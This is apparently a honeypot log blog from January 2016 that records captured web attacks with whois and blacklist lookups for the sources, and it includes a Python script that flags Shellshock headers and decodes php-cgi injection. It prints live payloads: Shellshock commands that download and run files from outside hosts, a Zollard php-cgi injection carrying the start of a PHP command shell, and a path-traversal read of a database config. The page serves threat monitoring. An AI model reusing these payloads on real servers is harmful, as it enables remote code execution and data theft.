Sunday, 24 January 2016

61.49.45.47 - WhatWeb/0.4.8-dev (first time seen)

BEGIN OF HTTP DATA:
2016-01-23 16:47:13
Source IP: 61.49.45.47
GET / HTTP/1.1
User-Agent: WhatWeb/0.4.8-dev
Host: 109.234.106.8:8080
Connection: close
Accept: */*
For more information: https://user-agents.me/crawler/whatweb048-dev
According to reports on the web, this crawler is meant to identify the websites and web technologies running on a server.

61.49.45[.]47

    Whois Data (TeamCymru)
  • AS : 4808
  • IP : 61.49.45.47
  • BGP Prefix : 61.49.0.0/18
  • CC : CN
  • Registry : apnic
  • Allocated : 2001-06-28
  • AS Name: CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network,CN
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/61.49.45.47

Thursday, 21 January 2016

213.136.72.84 - Shellshock perl via 204.232.209.188

BEGIN OF HTTP DATA:
2016-01-20 09:58:59
Source IP: 213.136.72.84
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  ");'
Host: 195.169.125.87
Connection: Close


END OF DATA

213.136.72[.]84

    Whois Data (TeamCymru)
  • AS : 51167
  • IP : 213.136.72.84
  • BGP Prefix : 213.136.72.0/23
  • CC : DE
  • Registry : ripencc
  • Allocated : 2000-02-28
  • AS Name: CONTABO Contabo GmbH,DE
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/213.136.72.84
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/213.136.72.84

204.232.209[.]188

    Whois Data (TeamCymru)
  • AS : 33070
  • IP : 204.232.209.188
  • BGP Prefix : 204.232.192.0/19
  • CC : US
  • Registry : arin
  • Allocated : 2009-06-24
  • AS Name: RMH-14 - Rackspace Hosting,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

92.45.197.218 - Zollard php execution

BEGIN OF HTTP DATA:
2016-01-21 09:47:25
Source IP: 92.45.197.218
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F
%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%6
9%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%
66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63
%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1817
Connection: close

<?php
echo "Zollard";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
 $disablefunc = str_replace(" ","",$disablefunc);
 $disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
 global $disablefunc;
 $result = "";
 if (!empty($cmd))
 {
  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru") and !in_array("passthru",$disabl

END OF DATA
Sadly, the request was too long to be fully logged by the fake HTTP server.

The decoded POST request line is:
POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n HTTP/1.1
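Two request shapes recur in the captures on this page: the Shellshock function prefix `() { :;};` carried in a header value (User-Agent in the perl and wget entries, Cookie in the `/rom-0` entry), and the php-cgi query string whose percent-encoded `-d` options are decoded in the line above. Both can be triaged automatically from the raw request. The following Python is an added example written for this post, not code from the honeypot or from any of its feeds; it reassembles three requests quoted on this page (the Zollard POST request line, the `/rom-0` request with the Cookie payload, and the WhatWeb probe), flags headers carrying the Shellshock prefix, decodes the php-cgi directives and lists which of them switch off the interpreter's hardening. The set of "risky" directives is an assumption made for this example, not something the page states.

```python
import re
from urllib.parse import unquote_plus

# Bash function-definition prefix that Shellshock payloads put in a header value.
# Optional whitespace lets both "() { :;};" and "() { :; };" (both seen on this
# page) match.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{\s*:\s*;\s*\}\s*;")

# php-cgi -d directives, with the values that disable the interpreter's hardening.
# Assumption made for this example, taken from the decoded Zollard request line.
RISKY_PHP_DIRECTIVES = {
    "allow_url_include": "on",
    "safe_mode": "off",
    "disable_functions": '""',
    "open_basedir": "none",
    "auto_prepend_file": "php://input",
    "cgi.force_redirect": "0",
}


def parse_request(raw):
    """Split a raw HTTP request into (method, target, headers); the body is ignored."""
    lines = raw.strip().splitlines()
    method, target = lines[0].split()[:2]
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return method, target, headers


def shellshock_headers(raw):
    """Names of the headers whose value carries the Shellshock function prefix."""
    _, _, headers = parse_request(raw)
    return [name for name, value in headers.items() if SHELLSHOCK_RE.search(value)]


def php_cgi_directives(target):
    """Decode a php-cgi argument-injection target into ({directive: value}, [flags]).

    Returns (None, None) when the path is not /cgi-bin/php* or no -d option is present.
    """
    path, _, query = target.partition("?")
    if not path.startswith("/cgi-bin/php"):
        return None, None
    tokens = iter(unquote_plus(query).split())  # '+' and %XX become plain text
    directives, flags = {}, []
    for tok in tokens:
        if tok == "-d":
            key, _, value = next(tokens, "").partition("=")
            directives[key] = value
        elif tok.startswith("-"):
            flags.append(tok)
    return (directives, flags) if directives else (None, None)


def triage(raw):
    """Per-request verdict: which technique is used, and which hardening it switches off."""
    method, target, _ = parse_request(raw)
    directives, _ = php_cgi_directives(target)
    risky = None
    if directives:
        risky = sorted(k for k, v in directives.items() if RISKY_PHP_DIRECTIVES.get(k) == v)
    return {
        "method": method,
        "shellshock_headers": shellshock_headers(raw),
        "php_cgi_injection": directives is not None,
        "risky_php_directives": risky,
    }


# Constructed samples, reassembled from requests quoted on this page (POST body omitted).
ZOLLARD_TARGET = (
    "/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F"
    "%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%6"
    "9%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%"
    "66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63"
    "%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E"
)
SAMPLE_ZOLLARD = (
    "POST " + ZOLLARD_TARGET + " HTTP/1.1\r\n"
    "Host: 195.169.125.87\r\n"
    "User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Connection: close\r\n"
)
SAMPLE_ROM0 = (
    "GET /rom-0 HTTP/1.1\r\n"
    "Host: 109.234.106.8\r\n"
    "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n"
    'Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"\r\n'
    "Connection: close\r\n"
)
SAMPLE_WHATWEB = (
    "GET / HTTP/1.1\r\n"
    "User-Agent: WhatWeb/0.4.8-dev\r\n"
    "Host: 109.234.106.8:8080\r\n"
    "Connection: close\r\n"
    "Accept: */*\r\n"
)

if __name__ == "__main__":
    for name, raw in [("zollard", SAMPLE_ZOLLARD), ("rom-0", SAMPLE_ROM0), ("whatweb", SAMPLE_WHATWEB)]:
        print(name, triage(raw))
```

The WhatWeb probe comes out clean on both checks, which is the point of running the scanner entry through the same code: fingerprinting traffic and exploitation attempts look alike in a raw log until the header values and the query string are actually decoded and inspected.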

92.45.197[.]218

    Whois Data (TeamCymru)
  • AS : 34984
  • IP : 92.45.197.218
  • BGP Prefix : 92.45.196.0/23
  • CC : TR
  • Registry : ripencc
  • Allocated : 2007-12-17
  • AS Name: TELLCOM-AS TELLCOM ILETISIM HIZMETLERI A.S.,TR
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

Wednesday, 13 January 2016

Scanner seen on January 14, 2016

  • 185.130.5.207 - muieblackcat
  • 37.142.32.222 - masscan/1.0
  • 149.78.19.136 - masscan/1.0
  • 195.169.125.87 - zgrab/0.x
  • 185.130.5.235 - muieblackcat

185.130.5[.]207

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.207
  • BGP Prefix : 185.130.5.0/24
  • CC : LT
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.207
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.207
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

37.142.32[.]222

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 37.142.32.222
  • BGP Prefix : 37.142.32.0/22
  • CC : IL
  • Registry : ripencc
  • Allocated : 2012-02-29
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/37.142.32.222

149.78.19[.]136

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 149.78.19.136
  • BGP Prefix : 149.78.0.0/19
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/149.78.19.136
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/149.78.19.136
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

195.169.125[.]87

    Whois Data (TeamCymru)
  • AS : 1103
  • IP : 195.169.125.87
  • BGP Prefix : 195.169.125.0/24
  • CC : NL
  • Registry : ripencc
  • Allocated :
  • AS Name: SURFNET-NL SURFnet, The Netherlands,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 50.118.172.34 / 195.169.125.87 - http javascript/html submission
  • Reference: http://sendmespamids.blogspot.com/2015/09/5011817234-http-javascripthtml.html
  • In db since: 2015-09-24 08:17:16.658000
    Source: Local Feed Database
  • Title: 46.172.71.251, 195.169.125.87 - to ping 212.47.238.143
  • Reference: http://sendmespamids.blogspot.com/2016/01/4617271251-19516912587-to-ping.html
  • In db since: 2016-01-09 11:54:24.541062

185.130.5[.]235

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.235
  • BGP Prefix : 185.130.5.0/24
  • CC : LT
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.235
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.235
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt

83.54.165.57 - Shellshock wget via http://192.192.78.216:9090

BEGIN OF HTTP DATA:
2016-01-13 08:48:44
Source IP: 83.54.165.57
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -O /tmp/S0.sh  && /bin/sh /tmp/S0.sh 0<&1 2>&1

83.54.165[.]57

    Whois Data (TeamCymru)
  • AS : 3352
  • IP : 83.54.165.57
  • BGP Prefix : 83.54.0.0/16
  • CC : ES
  • Registry : ripencc
  • Allocated : 2004-10-07
  • AS Name: TELEFONICA_DE_ESPANA TELEFONICA DE ESPANA,ES
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/83.54.165.57

192.192.78[.]216

    Whois Data (TeamCymru)
  • AS : 1659
  • IP : 192.192.78.216
  • BGP Prefix : 192.192.0.0/16
  • CC : TW
  • Registry : apnic
  • Allocated :
  • AS Name: ERX-TANET-ASN1 Taiwan Academic Network (TANet) Information Center,TW
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois


Tuesday, 12 January 2016

Scanner seen on January 11 and 12, 2016

  • 208.100.26.231 - Nmap Scripting Engine
  • 141.212.122.81 - zgrab/0.x
  • 141.212.122.145 - zgrab/0.x

208.100.26[.]231

    Whois Data (TeamCymru)
  • AS : 32748
  • IP : 208.100.26.231
  • BGP Prefix : 208.100.0.0/18
  • CC : US
  • Registry : arin
  • Allocated : 2006-02-17
  • AS Name: STEADFAST - Steadfast Networks,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/208.100.26.231
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt
    Source: Local Feed Database
  • Title: 208.100.26.231 - fire on port 8080
  • Reference: http://sendmespamids.blogspot.com/2015/09/20810026231-fire-on-port-8080.html
  • In db since: 2015-09-24 08:17:16.658000
    Source: Local Feed Database
  • Title: 208.100.26.231 - mongodb scanning ip
  • Reference: http://sendmespamids.blogspot.com/2015/10/20810026231-mongodb-scanning-ip.html
  • In db since: 2015-10-11 10:10:48.742000

141.212.122[.]81

    Whois Data (TeamCymru)
  • AS : 36375
  • IP : 141.212.122.81
  • BGP Prefix : 141.212.0.0/16
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: UMICH-AS-5 - University of Michigan,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/141.212.122.81

141.212.122[.]145

    Whois Data (TeamCymru)
  • AS : 36375
  • IP : 141.212.122.145
  • BGP Prefix : 141.212.0.0/16
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: UMICH-AS-5 - University of Michigan,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/141.212.122.145
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Saturday, 9 January 2016

85.73.42.84 - wget via http://lliillii.altervista.org/io.php

BEGIN OF HTTP DATA:
2016-01-08 10:07:22
Source IP: 85.73.42.84
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1

85.73.42[.]84

    Whois Data (TeamCymru)
  • AS : 6799
  • IP : 85.73.42.84
  • BGP Prefix : 85.73.0.0/16
  • CC : GR
  • Registry : ripencc
  • Allocated : 2006-05-17
  • AS Name: OTENET-GR Ote SA (Hellenic Telecommunications Organisation),GR
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

Scanner seen on January 9, 2016

  • 93.174.93.203 - masscan/1.0
  • 141.212.122.145 - zgrab/0.x
  • 69.30.217.226 - muieblackcat

93.174.93[.]203

    Whois Data (TeamCymru)
  • AS : 29073
  • IP : 93.174.93.203
  • BGP Prefix : 93.174.88.0/21
  • CC : NL
  • Registry : ripencc
  • Allocated : 2008-06-20
  • AS Name: ECATEL-AS Quasi Networks LTD.,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/93.174.93.203
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/93.174.93.203
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

141.212.122[.]145

    Whois Data (TeamCymru)
  • AS : 36375
  • IP : 141.212.122.145
  • BGP Prefix : 141.212.0.0/16
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: UMICH-AS-5 - University of Michigan,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/141.212.122.145
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/141.212.122.145
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

69.30.217[.]226

    Whois Data (TeamCymru)
  • AS : 32097
  • IP : 69.30.217.226
  • BGP Prefix : 69.30.192.0/18
  • CC : US
  • Registry : arin
  • Allocated : 2004-03-16
  • AS Name: WII-KC - WholeSale Internet, Inc.,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/69.30.217.226

Thursday, 7 January 2016

84.246.228.80 - access cnf/db.php

BEGIN OF HTTP DATA:
2016-01-07 21:11:32
Source IP: 84.246.228.80
GET /etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php HTTP/1.1
User-Agent: HTTP_Request2/2.2.1 (http://pear.php.net/package/http_request2) PHP/5.3.3
Host: 109.234.106.8
Accept-Encoding: gzip, deflate


84.246.228[.]80

    Whois Data (TeamCymru)
  • AS : 34274
  • IP : 84.246.228.80
  • BGP Prefix : 84.246.224.0/21
  • CC : FR
  • Registry : ripencc
  • Allocated : 2004-10-25
  • AS Name: ELBMULTIMEDIA ELB MULTIMEDIA,FR
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

Scanner seen on January 8, 2016

  • 185.130.5.207 - muieblackcat
  • 141.212.122.64 - zgrab/0.x
  • 5.28.172.193 - masscan/1.0

185.130.5[.]207

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.207
  • BGP Prefix : 185.130.5.0/24
  • CC : LT
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.207
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.207
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

141.212.122[.]64

    Whois Data (TeamCymru)
  • AS : 36375
  • IP : 141.212.122.64
  • BGP Prefix : 141.212.0.0/16
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: UMICH-AS-5 - University of Michigan,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 8.6
  • Reference: https://exchange.xforce.ibmcloud.com/ip/141.212.122.64
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/141.212.122.64
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

5.28.172[.]193

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 5.28.172.193
  • BGP Prefix : 5.28.160.0/20
  • CC : IL
  • Registry : ripencc
  • Allocated : 2012-05-08
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/5.28.172.193

Wednesday, 6 January 2016

Scanner seen on January 7, 2016

  • 149.78.19.136 - masscan/1.0
  • 213.57.67.192 - masscan/1.0
  • 94.102.48.195 - masscan/1.0
  • 195.169.125.87 - zgrab/0.x
  • 85.25.217.27 - muieblackcat

149.78.19[.]136

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 149.78.19.136
  • BGP Prefix : 149.78.0.0/19
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/149.78.19.136
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/149.78.19.136

213.57.67[.]192

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 213.57.67.192
  • BGP Prefix : 213.57.67.0/24
  • CC : IL
  • Registry : ripencc
  • Allocated :
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

94.102.48[.]195

    Whois Data (TeamCymru)
  • AS : 29073
  • IP : 94.102.48.195
  • BGP Prefix : 94.102.48.0/20
  • CC : NL
  • Registry : ripencc
  • Allocated : 2008-08-29
  • AS Name: ECATEL-AS Quasi Networks LTD.,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/94.102.48.195
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/94.102.48.195
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

195.169.125[.]87

    Whois Data (TeamCymru)
  • AS : 1103
  • IP : 195.169.125.87
  • BGP Prefix : 195.169.125.0/24
  • CC : NL
  • Registry : ripencc
  • Allocated :
  • AS Name: SURFNET-NL SURFnet, The Netherlands,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 50.118.172.34 / 195.169.125.87 - http javascript/html submission
  • Reference: http://sendmespamids.blogspot.com/2015/09/5011817234-http-javascripthtml.html
  • In db since: 2015-09-24 08:17:16.658000

85.25.217[.]27

    Whois Data (TeamCymru)
  • AS : 8972
  • IP : 85.25.217.27
  • BGP Prefix : 85.25.217.0/24
  • CC : DE
  • Registry : ripencc
  • Allocated : 2005-12-05
  • AS Name: PLUSSERVER-AS PlusServer AG,DE
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 7.1
  • Reference: https://exchange.xforce.ibmcloud.com/ip/85.25.217.27
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/85.25.217.27

Tuesday, 5 January 2016

46.172.71.251, 195.169.125.87 - to ping 212.47.238.143

BEGIN OF HTTP DATA:
2016-01-05 21:01:11
Source IP: 46.172.71.251 (2nd: 195.169.125.87)
GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close


END OF DATA

212.47.238[.]143

    Whois Data (TeamCymru)
  • AS : 12876
  • IP : 212.47.238.143
  • BGP Prefix : 212.47.224.0/19
  • CC : FR
  • Registry : ripencc
  • Allocated :
  • AS Name: AS12876 ONLINE S.A.S.,FR
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 185.93.185.47 - shellsock ping to 212.47.238.143
  • Reference: http://sendmespamids.blogspot.com/2015/10/1859318547-shellsock-ping-to-21247238143.html
  • In db since: 2015-11-05 09:22:48.499000

46.172.71[.]251

    Whois Data (TeamCymru)
  • AS : 43110
  • IP : 46.172.71.251
  • BGP Prefix : 46.172.64.0/19
  • CC : UA
  • Registry : ripencc
  • Allocated : 2010-12-06
  • AS Name: ROSTNET-AS Joint Ukrainian-American enterprise Ewropol with legal form Ltd,UA
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/46.172.71.251
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/46.172.71.251
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt
    Source: Local Feed Database
  • Title: 46.172.71.251 - simple bash injection
  • Reference: http://sendmespamids.blogspot.com/2015/09/4617271251-simple-bash-injection.html
  • In db since: 2015-09-24 08:17:16.658000

195.169.125[.]87

    Whois Data (TeamCymru)
  • AS : 1103
  • IP : 195.169.125.87
  • BGP Prefix : 195.169.125.0/24
  • CC : NL
  • Registry : ripencc
  • Allocated :
  • AS Name: SURFNET-NL SURFnet, The Netherlands,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 50.118.172.34 / 195.169.125.87 - http javascript/html submission
  • Reference: http://sendmespamids.blogspot.com/2015/09/5011817234-http-javascripthtml.html
  • In db since: 2015-09-24 08:17:16.658000

Monday, 4 January 2016

Scanner seen on January 05, 2016

  • 118.98.104[.]21 - Morfeus Fucking Scanner
  • 89.248.168[.]139 - masscan/1.0
  • 5.28.182[.]161 - masscan/1.0
  • 93.174.93[.]203 - masscan/1.0

118.98.104[.]21

    Whois Data (TeamCymru)
  • AS : 17974
  • IP : 118.98.104.21
  • BGP Prefix : 118.98.104.0/24
  • CC : ID
  • Registry : apnic
  • Allocated : 2007-08-24
  • AS Name: TELKOMNET-AS2-AP PT Telekomunikasi Indonesia,ID
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/118.98.104.21
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
